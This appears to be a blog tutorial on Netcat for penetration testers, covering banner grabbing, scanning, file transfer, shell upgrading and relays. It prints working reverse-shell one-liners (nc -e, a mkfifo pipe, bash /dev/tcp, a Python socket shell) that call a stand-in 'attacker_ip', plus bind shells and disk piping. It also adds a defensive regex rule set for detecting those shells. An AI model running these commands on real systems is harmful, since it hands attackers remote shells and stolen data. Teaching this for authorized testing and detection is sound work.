Ethical Hacking #netcat#reverse shell#pentesting

Netcat for Pentesters: The Complete Guide

Master Netcat for penetration testing. Learn banner grabbing, reverse shells, bind shells, port scanning, and file transfer with real commands.


Netcat is often called the Swiss Army knife of networking — and for good reason. This deceptively simple tool can open raw TCP and UDP connections, listen on arbitrary ports, transfer files, scan ports, grab service banners, and set up reverse or bind shells. It ships on virtually every Unix-like system and has been a staple in penetration testers’ toolkits for decades. This guide covers every major use case with real commands you can start using immediately.

What Is Netcat?

Netcat (nc) is a command-line utility that reads and writes data across network connections using TCP or UDP. It adds no protocol of its own: no application-layer handshake, authentication, or framing — just raw bytes on the socket. That simplicity is exactly what makes it so versatile.

Three main variants exist:

  • Traditional Netcat — the original nc, available on most Linux distros
  • Ncat — an improved version from the Nmap project with SSL support, access control, and proxy support. Available as ncat on Kali Linux.
  • Netcat-OpenBSD — the variant on Debian/Ubuntu, with slightly different flags (-e is removed for security)

Check which version you have (Ncat understands --version; the traditional and OpenBSD builds print their version line at the top of the -h usage text instead):

nc --version
ncat --version

Basic Syntax

nc [options] [hostname] [port]

Common flags:

Flag        Description
-l          Listen mode
-p <port>   Specify local port
-v          Verbose output
-vv         Very verbose
-n          No DNS resolution
-z          Zero-I/O mode (for scanning)
-w <secs>   Connection timeout
-u          Use UDP instead of TCP
-e <cmd>    Execute command (traditional nc only)
-k          Keep listening after client disconnects

Banner Grabbing

Banner grabbing is the act of connecting to a service and reading the information it returns. This reveals software names, versions, and sometimes configuration details useful for vulnerability research.

# HTTP banner grab
echo -e "HEAD / HTTP/1.0\r\n\r\n" | nc -v target.com 80

# FTP banner
nc -v target.com 21

# SSH banner
nc -v target.com 22

# SMTP banner
nc -v target.com 25

# Grab and immediately close after 3 seconds
nc -w 3 -v target.com 8080

For a quick service fingerprint across multiple ports, combine with a loop:

for port in 21 22 25 80 443 8080 8443; do
  echo -e "\n--- Port $port ---"
  echo "" | nc -w 1 -v target.com $port 2>&1 | head -5
done

Port Scanning

While not as feature-rich as Nmap, Netcat can perform basic TCP port scans with the -z flag:

# Scan a range of ports
nc -zv target.com 1-1024

# Scan specific ports quietly (no -v output, so check the exit status; -n skips DNS, so the host must be an IP address)
nc -zn target_ip 22 80 443 3306 5432

# UDP scan (unreliable: a UDP port that never answers is reported open unless an ICMP port-unreachable comes back)
nc -zuv target.com 53 161 500

The -z flag sends no data — it just checks whether the port accepts a connection. Combine with 2>&1 and grep succeeded to parse open ports (netcat-openbsd prints each per-port result on stderr, hence the redirect; Ncat prints "Connected to" instead, so adjust the pattern for it):

nc -zv target.com 1-65535 2>&1 | grep succeeded
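The grep pipeline above only recognises the netcat-openbsd wording and throws away the difference between a refused connection (closed) and a timeout (usually filtered by a firewall). The following parser, added here as an example and not part of the original post, handles both the netcat-openbsd and the Ncat output formats and keeps that distinction; the sample output it parses is constructed, not captured from a real host.

```python
import re

# Constructed sample output: `nc -zv 10.0.0.5 ... 2>&1` lines (netcat-openbsd)
# followed by an `ncat -zv 10.0.0.5 443` run (Ncat). Not captured from a real host.
SAMPLE_OUTPUT = """\
Connection to 10.0.0.5 22 port [tcp/ssh] succeeded!
nc: connect to 10.0.0.5 port 23 (tcp) failed: Connection refused
Connection to 10.0.0.5 80 port [tcp/http] succeeded!
nc: connect to 10.0.0.5 port 3306 (tcp) failed: Connection timed out
Ncat: Version 7.94 ( https://nmap.org/ncat )
Ncat: Connected to 10.0.0.5:443.
Ncat: 0 bytes sent, 0 bytes received in 0.01 seconds.
"""

# netcat-openbsd reports one line per port; Ncat reports one connection per run.
OPENBSD_OK = re.compile(r"^Connection to (\S+) (\d+) port \[(?:tcp|udp)/[^\]]*\] succeeded!")
OPENBSD_FAIL = re.compile(r"^nc: connect to (\S+) port (\d+) \((?:tcp|udp)\) failed: (.+)$")
NCAT_OK = re.compile(r"^Ncat: Connected to (\S+):(\d+)\.$")


def parse_scan(output):
    """Map (host, port) -> 'open' | 'closed' | 'filtered' from nc/ncat -zv output."""
    state = {}
    for line in output.splitlines():
        if m := OPENBSD_OK.match(line) or NCAT_OK.match(line):
            state[(m.group(1), int(m.group(2)))] = "open"
        elif m := OPENBSD_FAIL.match(line):
            # "Connection refused" means a RST came back (closed); a timeout means
            # nothing answered, which usually indicates a firewall drop (filtered).
            verdict = "closed" if "refused" in m.group(3) else "filtered"
            state[(m.group(1), int(m.group(2)))] = verdict
    return state


def open_ports(output):
    """Sorted open ports, the equivalent of the `grep succeeded` pipeline above."""
    return sorted(port for (_, port), s in parse_scan(output).items() if s == "open")
```

Feed it the saved scan output (for example the redirected file from the command above) and the filtered entries tell you where to raise -w rather than rescan blindly.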

File Transfer

Netcat makes an excellent quick file transfer tool when you do not have SCP or FTP access. Two caveats: nothing in the stream marks where the file ends, so with netcat-openbsd start the sender with -N (or -q 1 on traditional and Debian builds) so it closes the connection on EOF instead of hanging, and compare a sha256sum on both ends, because the transfer is neither encrypted nor integrity-checked.

On the receiving machine (listener):

nc -lvp 4444 > received_file.txt

On the sending machine:

nc target_ip 4444 < file_to_send.txt

Transfer a directory by piping through tar:

# Receiver
nc -lvp 4444 | tar xvf -

# Sender
tar cvf - /path/to/directory | nc target_ip 4444

Transfer a disk image or binary:

# Receiver
nc -lvp 4444 > backup.img

# Sender (reading the raw device requires root)
dd if=/dev/sda | nc target_ip 4444
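To make the two file-transfer caveats concrete, here is the same listener/sender pair implemented on raw sockets, added as an example and not part of the original post: the sender half-closes its write side after the last byte (what nc -N or -q does), which is the only thing that tells the listener the file is complete, and both ends hash what they saw so a truncated or corrupted transfer is detected. It runs entirely on loopback with a constructed random payload.

```python
import hashlib, os, socket, tempfile, threading

def receive_file(dest_path, port_ready, port_box):
    # Listener side, like `nc -l <port> > dest`: accept one connection and write raw
    # bytes to dest until the peer closes its write side (recv() returns b"" on EOF).
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))                  # port 0: the OS picks a free port
    srv.listen(1)
    port_box["port"] = srv.getsockname()[1]
    port_ready.set()
    conn, _ = srv.accept()
    digest = hashlib.sha256()
    with srv, conn, open(dest_path, "wb") as out:
        while chunk := conn.recv(65536):
            out.write(chunk)
            digest.update(chunk)
    return digest.hexdigest()

def send_file(host, port, src_path):
    # Sender side, like `nc host port < src` with -N/-q: stream the file, then
    # half-close so the listener sees EOF; without this step it waits forever.
    digest = hashlib.sha256()
    with socket.create_connection((host, port)) as s, open(src_path, "rb") as f:
        while chunk := f.read(65536):
            s.sendall(chunk)
            digest.update(chunk)
        s.shutdown(socket.SHUT_WR)
    return digest.hexdigest()

def transfer_and_verify(src_path, dest_path):
    # Run listener and sender on loopback; return (sender digest, receiver digest).
    port_ready, port_box, result = threading.Event(), {}, {}
    t = threading.Thread(target=lambda: result.update(rx=receive_file(dest_path, port_ready, port_box)))
    t.start()
    port_ready.wait()
    tx = send_file("127.0.0.1", port_box["port"], src_path)
    t.join()
    return tx, result["rx"]

def demo(size=1 << 20):
    # Transfer a constructed random file of `size` bytes; True if both hashes match.
    with tempfile.TemporaryDirectory() as d:
        src, dst = os.path.join(d, "backup.img"), os.path.join(d, "received.img")
        with open(src, "wb") as f:
            f.write(os.urandom(size))           # constructed sample payload
        tx, rx = transfer_and_verify(src, dst)
        return tx == rx and os.path.getsize(dst) == size
```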

Reverse Shells

A reverse shell causes the target machine to initiate a connection back to your listener. This is critical in penetration testing when the target is behind a firewall that blocks inbound connections.

Step 1 — Start your listener on the attacking machine:

nc -lvp 4444

Step 2 — Execute on the target (traditional nc with -e):

nc attacker_ip 4444 -e /bin/bash

Step 3 — If -e is not available (OpenBSD nc), use a named pipe:

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc attacker_ip 4444 > /tmp/f

Other reverse shell one-liners when nc is unavailable:

# Bash TCP reverse shell
bash -i >& /dev/tcp/attacker_ip/4444 0>&1

# Python reverse shell
python3 -c 'import socket,subprocess,os; s=socket.socket(); s.connect(("attacker_ip",4444)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); subprocess.call(["/bin/sh","-i"])'

Bind Shells

A bind shell opens a listening port on the target machine. You then connect to it from your attacking machine. Useful when you can reach the target but cannot receive inbound connections yourself.

On the target machine:

nc -lvp 4444 -e /bin/bash

On the attacking machine:

nc target_ip 4444

With the named pipe method (no -e):

rm /tmp/f; mkfifo /tmp/f; nc -l -p 4444 < /tmp/f | /bin/bash > /tmp/f
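Every one-liner in the reverse shell and bind shell sections above leaves a distinctive process command line, which is what endpoint telemetry (auditd execve records, EDR process-creation events) gives a defender to work with. The rule set below is an added example, not part of the original post: it matches the patterns shown on this page (nc with -e, the mkfifo pipe, bash /dev/tcp, the Python socket+dup2 shell, the pty.spawn upgrade, and the -z scan and piped-into-nc transfers from the earlier sections) against constructed sample command lines, not real logs.

```python
import re

# Process command lines to check (constructed sample telemetry, not real logs).
SAMPLE_CMDLINES = [
    "nc 10.0.0.9 4444 -e /bin/bash",
    "sh -c rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.0.0.9 4444 > /tmp/f",
    "bash -i >& /dev/tcp/10.0.0.9/4444 0>&1",
    'python3 -c import socket,subprocess,os; s=socket.socket(); s.connect(("10.0.0.9",4444)); os.dup2(s.fileno(),0); subprocess.call(["/bin/sh","-i"])',
    'python3 -c import pty; pty.spawn("/bin/bash")',
    "nc -lvp 4444 -e /bin/bash",
    "nc -zv 10.0.0.5 1-1024",
    "tar cvf - /var/log | nc 10.0.0.9 4444",
    "ls -la /tmp",
]

# Any of the netcat binary names, as a whole word.
NC = r"\b(?:nc|ncat|netcat|nc\.traditional|nc\.openbsd)\b"

# Each rule is (name, regex over the command line). They mirror the one-liners in
# the reverse shell, bind shell, port scanning and file transfer sections above;
# treat them as a starting point to tune against your own fleet's baseline.
RULES = [
    ("nc_exec",         re.compile(NC + r".*\s(?:-e|--exec|-c|--sh-exec)\s")),
    ("nc_fifo_shell",   re.compile(r"\bmkfifo\b.*" + NC)),
    ("dev_tcp_shell",   re.compile(r"/dev/(?:tcp|udp)/[\w.:-]+/\d+")),
    ("py_socket_shell", re.compile(r"socket.*dup2.*(?:subprocess|os\.system|pty)")),
    ("pty_upgrade",     re.compile(r"\bpty\.spawn\(")),
    ("nc_portscan",     re.compile(NC + r".*\s-[a-zA-Z]*z")),
    ("piped_into_nc",   re.compile(r"\|\s*" + NC + r"\s")),
]


def match_rules(cmdline):
    """Names of all rules that fire on one command line, in RULES order."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def triage(cmdlines):
    """(cmdline, matched_rules) for every command line that fires at least one rule."""
    return [(cmd, match_rules(cmd)) for cmd in cmdlines if match_rules(cmd)]


if __name__ == "__main__":
    for cmd, rules in triage(SAMPLE_CMDLINES):
        print(f"{', '.join(rules):32s} {cmd}")
```

Pair the nc_exec and nc_fifo_shell hits with the parent process: a shell spawned by a web server or database account is the case worth paging on.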

Upgrading a Netcat Shell

Raw Netcat shells are non-interactive — they lack tab completion, arrow keys, and job control. Upgrade to a fully interactive TTY immediately:

# In the nc shell, spawn a PTY with Python
python3 -c 'import pty; pty.spawn("/bin/bash")'

# Background the shell with Ctrl+Z, then in your local terminal:
stty raw -echo; fg

# Set terminal size
export TERM=xterm
stty rows 40 cols 140

Chat / Simple Relay

You can use Netcat as a simple one-to-one chat tool on a local network:

Machine A (listener):

nc -lvp 9999

Machine B (connector):

nc 192.168.1.10 9999

Both sides can now type messages and press Enter to send.

Port Forwarding and Relay

Chain two Netcat instances to relay traffic through an intermediary host:

# On pivot host: forward port 8080 traffic to internal target
mkfifo /tmp/relay
nc -lvp 8080 < /tmp/relay | nc 192.168.10.5 80 > /tmp/relay

Using Ncat for SSL

Ncat (from the Nmap project) adds SSL support for encrypted connections:

# Listener with SSL
ncat --ssl -lvp 4444

# Connect with SSL
ncat --ssl target_ip 4444

# Generate a self-signed cert for Ncat
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes
ncat --ssl --ssl-cert cert.pem --ssl-key key.pem -lvp 4444

Practical Tips

  • Always set a timeout (-w 3) when scanning to avoid hanging on filtered ports.
  • Use -n to skip DNS lookups and speed up scans.
  • Upgrade shells immediately — raw Netcat shells are fragile and close on any SIGINT.
  • For persistent listeners, use -k to keep Ncat listening after a client disconnects: ncat -lvkp 4444.
  • Log all traffic with Ncat’s --output flag for documentation in authorized engagements.

Setting up shells, transferring files, and conducting port scans using Netcat is only legal within the scope of systems you own or have explicit written authorization to test. Unauthorized use violates computer fraud laws in virtually every jurisdiction. Use these techniques only in lab environments or during sanctioned penetration tests.

Summary

Netcat’s power lies in its simplicity. Whether you need to grab a service banner in under two seconds, exfiltrate data from a compromised host, establish a reverse shell during a CTF, or debug a custom network service — nc handles it with minimal syntax. It is one of the first tools you should master, and one of the last you will ever stop using.
